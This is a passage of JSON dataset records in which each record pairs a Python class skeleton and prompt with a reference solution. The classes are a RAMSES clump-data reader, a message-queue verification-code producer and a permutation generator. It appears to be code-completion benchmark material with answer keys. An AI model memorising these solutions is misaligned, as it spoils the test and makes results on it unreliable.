"source_path": "vega/datasets/transforms/AutoAugment.py", "source_repo": "huawei-noah/vega", "split": "test", "star_events_count": 850} {"blob_id": "3632abcc7439085ef88503d6add1e4a6ed58b512", "bodies": ["self.clumpids = np.zeros(1)\nself.parent = np.zeros(1)\nself.level = np.zeros(1)\nreturn", "if par.verbose:\n print('Reading clump data.')\nout = p.z0\nraw_data = [None for i in range(par.ncpu)]\ndirnrstr = str(par.outputnrs[out]).zfill(5)\ndirname = 'output_' + dirnrstr\ni = 0\nfor cpu in range(par.ncpu):\n fname = os.path.join(dirname, 'clump_' + dirnrstr + '.txt' + str(cpu + 1).zfill(5))\n new_data = np.loadtxt(fname, dtype='int', skiprows=1, usecols=[0, 1, 2])\n if new_data.ndim == 2:\n raw_data[i] = new_data\n i += 1\n elif new_data.shape[0] == 3:\n raw_data[i] = np.atleast_2d(new_data)\n i += 1\nfulldata = np.concatenate(raw_data[:i], axis=0)\nself.clumpids = fulldata[:, 0]\nself.level = fulldata[:, 1]\nself.parent = fulldata[:, 2]\nreturn", "for i, c in enumerate(self.clumpids):\n if c not in mtd.descendants[par.z0]:\n self.clumpids[i] = 0\n self.level[i] = 0\n self.parent[i] = -1\nreturn", "children = []\nlast_added = [clumpid]\nloopcounter = 0\nwhile True:\n loopcounter += 1\n this_level_parents = copy.copy(last_added)\n children += this_level_parents\n last_added = []\n for i, cid in enumerate(self.clumpids):\n if self.parent[i] in this_level_parents and cid != clumpid:\n last_added.append(cid)\n if len(last_added) == 0:\n break\n if loopcounter == 100:\n print(\"Finished 100 iterations, we shouldn't be this deep\")\n break\nreturn children[1:]", "hfile = ''.join([par.halofilename, '-', str(clumpid), '.txt'])\nf = open(hfile, 'w')\nf.write('# {0:>18} {1:>18} {2:>18}\\n'.format('halo', 'nr_of_children', 'children'))\nnc = len(children)\ndumpstring = ' {0:18d} {1:18d}'.format(clumpid, nc)\ndumpstring = ''.join([dumpstring] + [' {0:18d}'.format(c) for c in children] + ['\\n'])\nf.write(dumpstring)\nf.close()\nreturn"], "bodies_text": "<|body_start_0|>\n self.clumpids = np.zeros(1)\n self.parent = np.zeros(1)\n self.level = np.zeros(1)\n return\n<|end_body_0|>\n\n<|body_start_1|>\n if par.verbose:\n print('Reading clump data.')\n out = p.z0\n raw_data = [None for i in range(par.ncpu)]\n dirnrstr = str(par.outputnrs[out]).zfill(5)\n dirname = 'output_' + dirnrstr\n i = 0\n for cpu in range(par.ncpu):\n fname = os.path.join(dirname, 'clump_' + dirnrstr + '.txt' + str(cpu + 1).zfill(5))\n new_data = np.loadtxt(fname, dtype='int', skiprows=1, usecols=[0, 1, 2])\n if new_data.ndim == 2:\n raw_data[i] = new_data\n i += 1\n elif new_data.shape[0] == 3:\n raw_data[i] = np.atleast_2d(new_data)\n i += 1\n fulldata = np.concatenate(raw_data[:i], axis=0)\n self.clumpids = fulldata[:, 0]\n self.level = fulldata[:, 1]\n self.parent = fulldata[:, 2]\n return\n<|end_body_1|>\n\n<|body_start_2|>\n for i, c in enumerate(self.clumpids):\n if c not in mtd.descendants[par.z0]:\n self.clumpids[i] = 0\n self.level[i] = 0\n self.parent[i] = -1\n return\n<|end_body_2|>\n\n<|body_start_3|>\n children = []\n last_added = [clumpid]\n loopcounter = 0\n while True:\n loopcounter += 1\n this_level_parents = copy.copy(last_added)\n children += this_level_parents\n last_added = []\n for i, cid in enumerate(self.clumpids):\n if self.parent[i] in this_level_parents and cid != clumpid:\n last_added.append(cid)\n if len(last_added) == 0:\n break\n if loopcounter == 100:\n print(\"Finished 100 iterations, we shouldn't be this deep\")\n break\n return children[1:]\n<|end_body_3|>\n\n<|body_start_4|>\n hfile = ''.join([par.halofilename, '-', str(clumpid), '.txt'])\n f = open(hfile, 'w')\n f.write('# {0:>18} {1:>18} {2:>18}\\n'.format('halo', 'nr_of_children', 'children'))\n nc = len(children)\n dumpstring = ' {0:18d} {1:18d}'.format(clumpid, nc)\n dumpstring = ''.join([dumpstring] + [' {0:18d}'.format(c) for c in children] + ['\\n'])\n f.write(dumpstring)\n f.close()\n return\n<|end_body_4|>\n", "class_docstring": "Data from clump_XXXXX.txtYYYYY", "class_name": "clumpdata", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass clumpdata:\n \"\"\"Data from clump_XXXXX.txtYYYYY\"\"\"\n\n def __init__(self, par):\n \"\"\"par: params object\"\"\"\n <|body_0|>\n\n def read_clumpdata(self, par):\n \"\"\"Reads in the clump data. Only for the z = 0 directory. par: params object\"\"\"\n <|body_1|>\n\n def cleanup_clumpdata(self, par, mtd):\n \"\"\"The particle unbinding can remove entire clumps from the catalogue. If the option isn't set in the namelist, the clumpfinder output will still be made not based on the clumpfinder. If that is the case, the clumpfinder catalogue will contain clumps which the mergertree data doesn't have, leading to problems. So remove those here. mtd: mergertree data object\"\"\"\n <|body_2|>\n\n def find_children(self, clumpid):\n \"\"\"Find the children for given clump ID. clumpid: clump ID for which to work for returns: children: list of children IDs of clumpid\"\"\"\n <|body_3|>\n\n def write_children(self, par, clumpid, children):\n \"\"\"Write the children to file. par: parameters object clumpid: ID of clump for which we're working children: list of children\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.clumpids = np.zeros(1)\n self.parent = np.zeros(1)\n self.level = np.zeros(1)\n return\n<|end_body_0|>\n\n<|body_start_1|>\n if par.verbose:\n print('Reading clump data.')\n out = p.z0\n raw_data = [None for i in range(par.ncpu)]\n dirnrstr = str(par.outputnrs[out]).zfill(5)\n dirname = 'output_' + dirnrstr\n i = 0\n for cpu in range(par.ncpu):\n fname = os.path.join(dirname, 'clump_' + dirnrstr + '.txt' + str(cpu + 1).zfill(5))\n new_data = np.loadtxt(fname, dtype='int', skiprows=1, usecols=[0, 1, 2])\n if new_data.ndim == 2:\n raw_data[i] = new_data\n i += 1\n elif new_data.shape[0] == 3:\n raw_data[i] = np.atleast_2d(new_data)\n i += 1\n fulldata = np.concatenate(raw_data[:i], axis=0)\n self.clumpids = fulldata[:, 0]\n self.level = fulldata[:, 1]\n self.parent = fulldata[:, 2]\n return\n<|end_body_1|>\n\n<|body_start_2|>\n for i, c in enumerate(self.clumpids):\n if c not in mtd.descendants[par.z0]:\n self.clumpids[i] = 0\n self.level[i] = 0\n self.parent[i] = -1\n return\n<|end_body_2|>\n\n<|body_start_3|>\n children = []\n last_added = [clumpid]\n loopcounter = 0\n while True:\n loopcounter += 1\n this_level_parents = copy.copy(last_added)\n children += this_level_parents\n last_added = []\n for i, cid in enumerate(self.clumpids):\n if self.parent[i] in this_level_parents and cid != clumpid:\n last_added.append(cid)\n if len(last_added) == 0:\n break\n if loopcounter == 100:\n print(\"Finished 100 iterations, we shouldn't be this deep\")\n break\n return children[1:]\n<|end_body_3|>\n\n<|body_start_4|>\n hfile = ''.join([par.halofilename, '-', str(clumpid), '.txt'])\n f = open(hfile, 'w')\n f.write('# {0:>18} {1:>18} {2:>18}\\n'.format('halo', 'nr_of_children', 'children'))\n nc = len(children)\n dumpstring = ' {0:18d} {1:18d}'.format(clumpid, nc)\n dumpstring = ''.join([dumpstring] + [' {0:18d}'.format(c) for c in children] + ['\\n'])\n f.write(dumpstring)\n f.close()\n return\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000461", "length_bytes": 36252, "license_type": "no_license", "methods": [{"docstring": "par: params object", "name": "__init__", "signature": "def __init__(self, par)"}, {"docstring": "Reads in the clump data. Only for the z = 0 directory. par: params object", "name": "read_clumpdata", "signature": "def read_clumpdata(self, par)"}, {"docstring": "The particle unbinding can remove entire clumps from the catalogue. If the option isn't set in the namelist, the clumpfinder output will still be made not based on the clumpfinder. If that is the case, the clumpfinder catalogue will contain clumps which the mergertree data doesn't have, leading to problems. So remove those here. mtd: mergertree data object", "name": "cleanup_clumpdata", "signature": "def cleanup_clumpdata(self, par, mtd)"}, {"docstring": "Find the children for given clump ID. clumpid: clump ID for which to work for returns: children: list of children IDs of clumpid", "name": "find_children", "signature": "def find_children(self, clumpid)"}, {"docstring": "Write the children to file. par: parameters object clumpid: ID of clump for which we're working children: list of children", "name": "write_children", "signature": "def write_children(self, par, clumpid, children)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_005179", "prompt": "Implement the Python class `clumpdata` described below.\n\nClass description:\nData from clump_XXXXX.txtYYYYY\n\nMethod signatures and docstrings:\n- def __init__(self, par): par: params object\n- def read_clumpdata(self, par): Reads in the clump data. Only for the z = 0 directory. par: params object\n- def cleanup_clumpdata(self, par, mtd): The particle unbinding can remove entire clumps from the catalogue. If the option isn't set in the namelist, the clumpfinder output will still be made not based on the clumpfinder. If that is the case, the clumpfinder catalogue will contain clumps which the mergertree data doesn't have, leading to problems. So remove those here. mtd: mergertree data object\n- def find_children(self, clumpid): Find the children for given clump ID. clumpid: clump ID for which to work for returns: children: list of children IDs of clumpid\n- def write_children(self, par, clumpid, children): Write the children to file. par: parameters object clumpid: ID of clump for which we're working children: list of children", "prompted_full_text": "Implement the Python class `clumpdata` described below.\n\nClass description:\nData from clump_XXXXX.txtYYYYY\n\nMethod signatures and docstrings:\n- def __init__(self, par): par: params object\n- def read_clumpdata(self, par): Reads in the clump data. Only for the z = 0 directory. par: params object\n- def cleanup_clumpdata(self, par, mtd): The particle unbinding can remove entire clumps from the catalogue. If the option isn't set in the namelist, the clumpfinder output will still be made not based on the clumpfinder. If that is the case, the clumpfinder catalogue will contain clumps which the mergertree data doesn't have, leading to problems. So remove those here. mtd: mergertree data object\n- def find_children(self, clumpid): Find the children for given clump ID. clumpid: clump ID for which to work for returns: children: list of children IDs of clumpid\n- def write_children(self, par, clumpid, children): Write the children to file. par: parameters object clumpid: ID of clump for which we're working children: list of children\n\n<|skeleton|>\nclass clumpdata:\n \"\"\"Data from clump_XXXXX.txtYYYYY\"\"\"\n\n def __init__(self, par):\n \"\"\"par: params object\"\"\"\n <|body_0|>\n\n def read_clumpdata(self, par):\n \"\"\"Reads in the clump data. Only for the z = 0 directory. par: params object\"\"\"\n <|body_1|>\n\n def cleanup_clumpdata(self, par, mtd):\n \"\"\"The particle unbinding can remove entire clumps from the catalogue. If the option isn't set in the namelist, the clumpfinder output will still be made not based on the clumpfinder. If that is the case, the clumpfinder catalogue will contain clumps which the mergertree data doesn't have, leading to problems. So remove those here. mtd: mergertree data object\"\"\"\n <|body_2|>\n\n def find_children(self, clumpid):\n \"\"\"Find the children for given clump ID. clumpid: clump ID for which to work for returns: children: list of children IDs of clumpid\"\"\"\n <|body_3|>\n\n def write_children(self, par, clumpid, children):\n \"\"\"Write the children to file. par: parameters object clumpid: ID of clump for which we're working children: list of children\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.clumpids = np.zeros(1)\n self.parent = np.zeros(1)\n self.level = np.zeros(1)\n return\n<|end_body_0|>\n\n<|body_start_1|>\n if par.verbose:\n print('Reading clump data.')\n out = p.z0\n raw_data = [None for i in range(par.ncpu)]\n dirnrstr = str(par.outputnrs[out]).zfill(5)\n dirname = 'output_' + dirnrstr\n i = 0\n for cpu in range(par.ncpu):\n fname = os.path.join(dirname, 'clump_' + dirnrstr + '.txt' + str(cpu + 1).zfill(5))\n new_data = np.loadtxt(fname, dtype='int', skiprows=1, usecols=[0, 1, 2])\n if new_data.ndim == 2:\n raw_data[i] = new_data\n i += 1\n elif new_data.shape[0] == 3:\n raw_data[i] = np.atleast_2d(new_data)\n i += 1\n fulldata = np.concatenate(raw_data[:i], axis=0)\n self.clumpids = fulldata[:, 0]\n self.level = fulldata[:, 1]\n self.parent = fulldata[:, 2]\n return\n<|end_body_1|>\n\n<|body_start_2|>\n for i, c in enumerate(self.clumpids):\n if c not in mtd.descendants[par.z0]:\n self.clumpids[i] = 0\n self.level[i] = 0\n self.parent[i] = -1\n return\n<|end_body_2|>\n\n<|body_start_3|>\n children = []\n last_added = [clumpid]\n loopcounter = 0\n while True:\n loopcounter += 1\n this_level_parents = copy.copy(last_added)\n children += this_level_parents\n last_added = []\n for i, cid in enumerate(self.clumpids):\n if self.parent[i] in this_level_parents and cid != clumpid:\n last_added.append(cid)\n if len(last_added) == 0:\n break\n if loopcounter == 100:\n print(\"Finished 100 iterations, we shouldn't be this deep\")\n break\n return children[1:]\n<|end_body_3|>\n\n<|body_start_4|>\n hfile = ''.join([par.halofilename, '-', str(clumpid), '.txt'])\n f = open(hfile, 'w')\n f.write('# {0:>18} {1:>18} {2:>18}\\n'.format('halo', 'nr_of_children', 'children'))\n nc = len(children)\n dumpstring = ' {0:18d} {1:18d}'.format(clumpid, nc)\n dumpstring = ''.join([dumpstring] + [' {0:18d}'.format(c) for c in children] + ['\\n'])\n f.write(dumpstring)\n f.close()\n return\n<|end_body_4|>\n", "revision_id": "f1bd65ef106dbf5e4cefefd7d386643a6fc0ac52", "skeleton": "<|skeleton|>\nclass clumpdata:\n \"\"\"Data from clump_XXXXX.txtYYYYY\"\"\"\n\n def __init__(self, par):\n \"\"\"par: params object\"\"\"\n <|body_0|>\n\n def read_clumpdata(self, par):\n \"\"\"Reads in the clump data. Only for the z = 0 directory. par: params object\"\"\"\n <|body_1|>\n\n def cleanup_clumpdata(self, par, mtd):\n \"\"\"The particle unbinding can remove entire clumps from the catalogue. If the option isn't set in the namelist, the clumpfinder output will still be made not based on the clumpfinder. If that is the case, the clumpfinder catalogue will contain clumps which the mergertree data doesn't have, leading to problems. So remove those here. mtd: mergertree data object\"\"\"\n <|body_2|>\n\n def find_children(self, clumpid):\n \"\"\"Find the children for given clump ID. clumpid: clump ID for which to work for returns: children: list of children IDs of clumpid\"\"\"\n <|body_3|>\n\n def write_children(self, par, clumpid, children):\n \"\"\"Write the children to file. par: parameters object clumpid: ID of clump for which we're working children: list of children\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class clumpdata:\n \"\"\"Data from clump_XXXXX.txtYYYYY\"\"\"\n\n def __init__(self, par):\n \"\"\"par: params object\"\"\"\n self.clumpids = np.zeros(1)\n self.parent = np.zeros(1)\n self.level = np.zeros(1)\n return\n\n def read_clumpdata(self, par):\n \"\"\"Reads in the clump data. Only for the z = 0 directory. par: params object\"\"\"\n if par.verbose:\n print('Reading clump data.')\n out = p.z0\n raw_data = [None for i in range(par.ncpu)]\n dirnrstr = str(par.outputnrs[out]).zfill(5)\n dirname = 'output_' + dirnrstr\n i = 0\n for cpu in range(par.ncpu):\n fname = os.path.join(dirname, 'clump_' + dirnrstr + '.txt' + str(cpu + 1).zfill(5))\n new_data = np.loadtxt(fname, dtype='int', skiprows=1, usecols=[0, 1, 2])\n if new_data.ndim == 2:\n raw_data[i] = new_data\n i += 1\n elif new_data.shape[0] == 3:\n raw_data[i] = np.atleast_2d(new_data)\n i += 1\n fulldata = np.concatenate(raw_data[:i], axis=0)\n self.clumpids = fulldata[:, 0]\n self.level = fulldata[:, 1]\n self.parent = fulldata[:, 2]\n return\n\n def cleanup_clumpdata(self, par, mtd):\n \"\"\"The particle unbinding can remove entire clumps from the catalogue. If the option isn't set in the namelist, the clumpfinder output will still be made not based on the clumpfinder. If that is the case, the clumpfinder catalogue will contain clumps which the mergertree data doesn't have, leading to problems. So remove those here. mtd: mergertree data object\"\"\"\n for i, c in enumerate(self.clumpids):\n if c not in mtd.descendants[par.z0]:\n self.clumpids[i] = 0\n self.level[i] = 0\n self.parent[i] = -1\n return\n\n def find_children(self, clumpid):\n \"\"\"Find the children for given clump ID. clumpid: clump ID for which to work for returns: children: list of children IDs of clumpid\"\"\"\n children = []\n last_added = [clumpid]\n loopcounter = 0\n while True:\n loopcounter += 1\n this_level_parents = copy.copy(last_added)\n children += this_level_parents\n last_added = []\n for i, cid in enumerate(self.clumpids):\n if self.parent[i] in this_level_parents and cid != clumpid:\n last_added.append(cid)\n if len(last_added) == 0:\n break\n if loopcounter == 100:\n print(\"Finished 100 iterations, we shouldn't be this deep\")\n break\n return children[1:]\n\n def write_children(self, par, clumpid, children):\n \"\"\"Write the children to file. par: parameters object clumpid: ID of clump for which we're working children: list of children\"\"\"\n hfile = ''.join([par.halofilename, '-', str(clumpid), '.txt'])\n f = open(hfile, 'w')\n f.write('# {0:>18} {1:>18} {2:>18}\\n'.format('halo', 'nr_of_children', 'children'))\n nc = len(children)\n dumpstring = ' {0:18d} {1:18d}'.format(clumpid, nc)\n dumpstring = ''.join([dumpstring] + [' {0:18d}'.format(c) for c in children] + ['\\n'])\n f.write(dumpstring)\n f.close()\n return\n", "source": "the_stack_v2_python_sparse", "source_path": "utils/py/mergertree-extract.py", "source_repo": "ALaDyn/ramses", "split": "test", "star_events_count": 6} {"blob_id": "6d3fdf0494fbb798c0d597d75943e07f32e156e1", "bodies": ["self.target = target\nself.code = code\nself.routing_key = template", "email_com = re.compile('(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)')\nemailmatch = email_com.match(self.target)\nif emailmatch:\n return True\nmobile_com = re.compile('^(?:\\\\+?86)?1(?:3\\\\d{3}|5[^4\\\\D]\\\\d{2}|8\\\\d{3}|7(?:[01356789]\\\\d{2}|4(?:0\\\\d|1[0-2]|9\\\\d))|9[189]\\\\d{2}|6[567]\\\\d{2}|4[579]\\\\d{2})\\\\d{6}$')\nmobilematch = mobile_com.match(self.target)\nif mobilematch:\n return True\nreturn False", "body = {'target': self.target, 'code': self.code, 'routing_key': self.routing_key}\nbody_json = json.dumps(body).encode('utf8')\nconnection, channel = get_mq_channel()\nchannel.exchange_declare(exchange=MQEXCHANGE, exchange_type=MQEXCHANGETYPE)\nchannel.basic_publish(exchange=MQEXCHANGE, routing_key=self.routing_key, body=body_json)\nprint(' [x] Sent %r:%r' % (self.routing_key, self.code))\nconnection.close()"], "bodies_text": "<|body_start_0|>\n self.target = target\n self.code = code\n self.routing_key = template\n<|end_body_0|>\n\n<|body_start_1|>\n email_com = re.compile('(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)')\n emailmatch = email_com.match(self.target)\n if emailmatch:\n return True\n mobile_com = re.compile('^(?:\\\\+?86)?1(?:3\\\\d{3}|5[^4\\\\D]\\\\d{2}|8\\\\d{3}|7(?:[01356789]\\\\d{2}|4(?:0\\\\d|1[0-2]|9\\\\d))|9[189]\\\\d{2}|6[567]\\\\d{2}|4[579]\\\\d{2})\\\\d{6}$')\n mobilematch = mobile_com.match(self.target)\n if mobilematch:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n body = {'target': self.target, 'code': self.code, 'routing_key': self.routing_key}\n body_json = json.dumps(body).encode('utf8')\n connection, channel = get_mq_channel()\n channel.exchange_declare(exchange=MQEXCHANGE, exchange_type=MQEXCHANGETYPE)\n channel.basic_publish(exchange=MQEXCHANGE, routing_key=self.routing_key, body=body_json)\n print(' [x] Sent %r:%r' % (self.routing_key, self.code))\n connection.close()\n<|end_body_2|>\n", "class_docstring": "消息队列的生产者:主要是通过短信和邮件获得验证码", "class_name": "Product", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Product:\n \"\"\"消息队列的生产者:主要是通过短信和邮件获得验证码\"\"\"\n\n def __init__(self, target, code, template, ip=None, **kwargs):\n \"\"\":param target: mobile email 平台的发送目标 e.g: mobile:139xx99 email:16xx3@qq.com :param code: 自定义发送内容 e.g: mobile:8888 :param template: 指定平台的发送信息的模板样式,同时也是队列的路由关键字 e.g: mobile:sms_register email:email_info :param ip: :param kwargs:\"\"\"\n <|body_0|>\n\n def verification_target(self):\n \"\"\"鉴别target是否有效 :return:\"\"\"\n <|body_1|>\n\n def send(self):\n \"\"\"生产者产生消息\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.target = target\n self.code = code\n self.routing_key = template\n<|end_body_0|>\n\n<|body_start_1|>\n email_com = re.compile('(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)')\n emailmatch = email_com.match(self.target)\n if emailmatch:\n return True\n mobile_com = re.compile('^(?:\\\\+?86)?1(?:3\\\\d{3}|5[^4\\\\D]\\\\d{2}|8\\\\d{3}|7(?:[01356789]\\\\d{2}|4(?:0\\\\d|1[0-2]|9\\\\d))|9[189]\\\\d{2}|6[567]\\\\d{2}|4[579]\\\\d{2})\\\\d{6}$')\n mobilematch = mobile_com.match(self.target)\n if mobilematch:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n body = {'target': self.target, 'code': self.code, 'routing_key': self.routing_key}\n body_json = json.dumps(body).encode('utf8')\n connection, channel = get_mq_channel()\n channel.exchange_declare(exchange=MQEXCHANGE, exchange_type=MQEXCHANGETYPE)\n channel.basic_publish(exchange=MQEXCHANGE, routing_key=self.routing_key, body=body_json)\n print(' [x] Sent %r:%r' % (self.routing_key, self.code))\n connection.close()\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000462", "length_bytes": 2913, "license_type": "no_license", "methods": [{"docstring": ":param target: mobile email 平台的发送目标 e.g: mobile:139xx99 email:16xx3@qq.com :param code: 自定义发送内容 e.g: mobile:8888 :param template: 指定平台的发送信息的模板样式,同时也是队列的路由关键字 e.g: mobile:sms_register email:email_info :param ip: :param kwargs:", "name": "__init__", "signature": "def __init__(self, target, code, template, ip=None, **kwargs)"}, {"docstring": "鉴别target是否有效 :return:", "name": "verification_target", "signature": "def verification_target(self)"}, {"docstring": "生产者产生消息", "name": "send", "signature": "def send(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005295", "prompt": "Implement the Python class `Product` described below.\n\nClass description:\n消息队列的生产者:主要是通过短信和邮件获得验证码\n\nMethod signatures and docstrings:\n- def __init__(self, target, code, template, ip=None, **kwargs): :param target: mobile email 平台的发送目标 e.g: mobile:139xx99 email:16xx3@qq.com :param code: 自定义发送内容 e.g: mobile:8888 :param template: 指定平台的发送信息的模板样式,同时也是队列的路由关键字 e.g: mobile:sms_register email:email_info :param ip: :param kwargs:\n- def verification_target(self): 鉴别target是否有效 :return:\n- def send(self): 生产者产生消息", "prompted_full_text": "Implement the Python class `Product` described below.\n\nClass description:\n消息队列的生产者:主要是通过短信和邮件获得验证码\n\nMethod signatures and docstrings:\n- def __init__(self, target, code, template, ip=None, **kwargs): :param target: mobile email 平台的发送目标 e.g: mobile:139xx99 email:16xx3@qq.com :param code: 自定义发送内容 e.g: mobile:8888 :param template: 指定平台的发送信息的模板样式,同时也是队列的路由关键字 e.g: mobile:sms_register email:email_info :param ip: :param kwargs:\n- def verification_target(self): 鉴别target是否有效 :return:\n- def send(self): 生产者产生消息\n\n<|skeleton|>\nclass Product:\n \"\"\"消息队列的生产者:主要是通过短信和邮件获得验证码\"\"\"\n\n def __init__(self, target, code, template, ip=None, **kwargs):\n \"\"\":param target: mobile email 平台的发送目标 e.g: mobile:139xx99 email:16xx3@qq.com :param code: 自定义发送内容 e.g: mobile:8888 :param template: 指定平台的发送信息的模板样式,同时也是队列的路由关键字 e.g: mobile:sms_register email:email_info :param ip: :param kwargs:\"\"\"\n <|body_0|>\n\n def verification_target(self):\n \"\"\"鉴别target是否有效 :return:\"\"\"\n <|body_1|>\n\n def send(self):\n \"\"\"生产者产生消息\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.target = target\n self.code = code\n self.routing_key = template\n<|end_body_0|>\n\n<|body_start_1|>\n email_com = re.compile('(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)')\n emailmatch = email_com.match(self.target)\n if emailmatch:\n return True\n mobile_com = re.compile('^(?:\\\\+?86)?1(?:3\\\\d{3}|5[^4\\\\D]\\\\d{2}|8\\\\d{3}|7(?:[01356789]\\\\d{2}|4(?:0\\\\d|1[0-2]|9\\\\d))|9[189]\\\\d{2}|6[567]\\\\d{2}|4[579]\\\\d{2})\\\\d{6}$')\n mobilematch = mobile_com.match(self.target)\n if mobilematch:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n body = {'target': self.target, 'code': self.code, 'routing_key': self.routing_key}\n body_json = json.dumps(body).encode('utf8')\n connection, channel = get_mq_channel()\n channel.exchange_declare(exchange=MQEXCHANGE, exchange_type=MQEXCHANGETYPE)\n channel.basic_publish(exchange=MQEXCHANGE, routing_key=self.routing_key, body=body_json)\n print(' [x] Sent %r:%r' % (self.routing_key, self.code))\n connection.close()\n<|end_body_2|>\n", "revision_id": "b7aecaf01497806617489cc25b3491a6422f69fb", "skeleton": "<|skeleton|>\nclass Product:\n \"\"\"消息队列的生产者:主要是通过短信和邮件获得验证码\"\"\"\n\n def __init__(self, target, code, template, ip=None, **kwargs):\n \"\"\":param target: mobile email 平台的发送目标 e.g: mobile:139xx99 email:16xx3@qq.com :param code: 自定义发送内容 e.g: mobile:8888 :param template: 指定平台的发送信息的模板样式,同时也是队列的路由关键字 e.g: mobile:sms_register email:email_info :param ip: :param kwargs:\"\"\"\n <|body_0|>\n\n def verification_target(self):\n \"\"\"鉴别target是否有效 :return:\"\"\"\n <|body_1|>\n\n def send(self):\n \"\"\"生产者产生消息\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Product:\n \"\"\"消息队列的生产者:主要是通过短信和邮件获得验证码\"\"\"\n\n def __init__(self, target, code, template, ip=None, **kwargs):\n \"\"\":param target: mobile email 平台的发送目标 e.g: mobile:139xx99 email:16xx3@qq.com :param code: 自定义发送内容 e.g: mobile:8888 :param template: 指定平台的发送信息的模板样式,同时也是队列的路由关键字 e.g: mobile:sms_register email:email_info :param ip: :param kwargs:\"\"\"\n self.target = target\n self.code = code\n self.routing_key = template\n\n def verification_target(self):\n \"\"\"鉴别target是否有效 :return:\"\"\"\n email_com = re.compile('(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)')\n emailmatch = email_com.match(self.target)\n if emailmatch:\n return True\n mobile_com = re.compile('^(?:\\\\+?86)?1(?:3\\\\d{3}|5[^4\\\\D]\\\\d{2}|8\\\\d{3}|7(?:[01356789]\\\\d{2}|4(?:0\\\\d|1[0-2]|9\\\\d))|9[189]\\\\d{2}|6[567]\\\\d{2}|4[579]\\\\d{2})\\\\d{6}$')\n mobilematch = mobile_com.match(self.target)\n if mobilematch:\n return True\n return False\n\n def send(self):\n \"\"\"生产者产生消息\"\"\"\n body = {'target': self.target, 'code': self.code, 'routing_key': self.routing_key}\n body_json = json.dumps(body).encode('utf8')\n connection, channel = get_mq_channel()\n channel.exchange_declare(exchange=MQEXCHANGE, exchange_type=MQEXCHANGETYPE)\n channel.basic_publish(exchange=MQEXCHANGE, routing_key=self.routing_key, body=body_json)\n print(' [x] Sent %r:%r' % (self.routing_key, self.code))\n connection.close()\n", "source": "the_stack_v2_python_sparse", "source_path": "Dockerfiles/mq/expand/direct_product.py", "source_repo": "leipengkai/docker-drf", "split": "test", "star_events_count": 1} {"blob_id": "ef67cb7ddd6a739eaf553b30cf2bfe82fc573c92", "bodies": ["total_n = factorial(len(nums))\nresult = []\nfor i in range(total_n):\n result.append(nums[:])\n nums = self.next_permute(nums)\nreturn result", "first_idx = len(nums) - 2\nsecond_idx = len(nums) - 1\nwhile first_idx >= 0 and nums[first_idx] >= nums[first_idx + 1]:\n first_idx -= 1\nif first_idx == -1:\n return nums[:][::-1]\nelse:\n ans = nums[:]\n while ans[second_idx] <= ans[first_idx]:\n second_idx -= 1\n ans[first_idx], ans[second_idx] = (ans[second_idx], ans[first_idx])\n ans[first_idx + 1:] = ans[first_idx + 1:][::-1]\n return ans"], "bodies_text": "<|body_start_0|>\n total_n = factorial(len(nums))\n result = []\n for i in range(total_n):\n result.append(nums[:])\n nums = self.next_permute(nums)\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n first_idx = len(nums) - 2\n second_idx = len(nums) - 1\n while first_idx >= 0 and nums[first_idx] >= nums[first_idx + 1]:\n first_idx -= 1\n if first_idx == -1:\n return nums[:][::-1]\n else:\n ans = nums[:]\n while ans[second_idx] <= ans[first_idx]:\n second_idx -= 1\n ans[first_idx], ans[second_idx] = (ans[second_idx], ans[first_idx])\n ans[first_idx + 1:] = ans[first_idx + 1:][::-1]\n return ans\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution_B2", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution_B2:\n\n def permute(self, nums: List[int]) -> List[List[int]]:\n \"\"\"Version B2 Non-proxy, recursive method, but direct handle elements in nums This only works for when sample is a collection of distinct numbers\"\"\"\n <|body_0|>\n\n def next_permute(self, nums: List[int]) -> List[int]:\n \"\"\"Herlper for B1, B2 From Leetcode LC031: next permutation, modified to return a new permute list instead in-place calculate the next permuatation, with integers 0 to N-1 (as idx proxy) this will both modify idx_list and return the updated idx_list\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n total_n = factorial(len(nums))\n result = []\n for i in range(total_n):\n result.append(nums[:])\n nums = self.next_permute(nums)\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n first_idx = len(nums) - 2\n second_idx = len(nums) - 1\n while first_idx >= 0 and nums[first_idx] >= nums[first_idx + 1]:\n first_idx -= 1\n if first_idx == -1:\n return nums[:][::-1]\n else:\n ans = nums[:]\n while ans[second_idx] <= ans[first_idx]:\n second_idx -= 1\n ans[first_idx], ans[second_idx] = 